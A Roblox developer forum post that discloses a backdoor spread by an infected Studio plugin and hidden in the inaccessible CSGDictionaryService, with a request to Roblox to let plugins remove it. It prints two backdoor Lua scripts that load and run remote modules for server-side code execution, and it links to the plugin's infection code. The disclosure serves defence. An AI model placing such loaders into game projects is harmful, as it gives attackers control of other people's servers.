(NEW: Plugin created for automated removal/reparenting of this infection! Hidden/Infection Script Detector - Roblox)
Shoutout to Dekkonot for making me aware of “GetDescendants” which made the creation of this plugin possible!
I recently looked into reports of server-side script injection exploitation at a game I occasionally assist in development and it intrigued me as the game is FilteringEnabled as well as the developers who worked on it were quite thorough on security. After a long time searching and testing I found the culprit was a backdoor installed by an infected plugin (the offending plugin is unknown at this time) and so I began searching for the backdoor script. After a lengthy search which ultimately resulted in me deleting everything visible in studio’s explorer, saving the game as a file, and reuploading to a new place only to find the infection still was there. This confirmed the infection was in a location non-viewable and inaccessible to both studio explorer and command bar (as I had made and been running numerous search scripts.) Once I learned of this I saved the place to xml, opened it in a text editor, and began reading. Thankfully before long I came across the culprit and began attempting to build a plugin to remove the infection from any game with it. I soon found that the area the infection was placed into is level 6 access restricted (and the documentation stating that plugins have level 6 is inaccurate as plugins only have level 5 access) so the only way to remove this infection is by altering the xml save file in a text editor and reuploading it. This poses a serious issue as most places don’t know they are infected and have no way to find out other than thorough investigation only to either never find the source (a bad plugin) or never find the backdoor (inaccessable to everything except the place saved in xml format opened in a text editor.) At the very least I’d like to request ROBLOX fix plugin access level to be capable of indexing and reading the children of a level 6 protected asset so an open-source plugin for removing this infection can be distributed. Preferably this service and/or it’s children also would not publish into the game via studio. Below are related links and the backdoor scripts hidden inside the “CSGDictionaryService” as well as the xml and a sample infected place save file.
Place Infection XML excerpt “CSGDictionaryService”: InfectedPlaceExcerpt.txt (19.0 KB)
Infected place xml save file: InfectedPlace.rbxlx (36.0 KB)
Backdoor scripts inserted by malicious plugins:
–Script 1
spawn(function()
game:WaitForChild("ServerScriptService")
if game:GetService("Workspace").Terrain:FindFirstChild("CallF")then return end;
if game:GetService("RunService"):IsStudio()then return end;
pcall(function()
require(2655056793).load(game.PlaceId)
end)
end)
–Script 2
marketplaceService = game:GetService("MarketplaceService")
productInfo = marketplaceService:GetProductInfo(2655062037)
modulefunc = productInfo.Description
modulefunc = tonumber(string.match(modulefunc, "%d+"))
require(modulefunc)[tostring(productInfo.Name)](game.PlaceId)
This grants anyone who purchases the exploit to execute server-side code at any infected place. The exploited in code also sends a HttpService request to the exploiter creator’s webservers which marks the place as infected and places it in a list for the users of said exploit to pick through and terrorize at will.
Edit: I have been informed by one of the devs involved that this was the offending plugin: [ Content Deleted ] - Roblox
(and just in case the plugin creator attempts to update it to remove the infection I have a copy saved here: 3bc2897e11825866ad1a687005730a09.rbxm (62.5 KB) )
…or if you just want the code that actually inserts the malicious scripts into the CSGDictionaryService I put it here: SirHurt plugin infection code - Pastebin.com
Edit 2: I went ahead and decoded the actual infection script from the infected plugin. Now I give it to you all for your viewing/reading pleasure Decrypted Infection Script - Pastebin.com (The data variable in the infection script also included some garbled nonsense that I assume is a function dump but the actual infection code is what I put into the post.)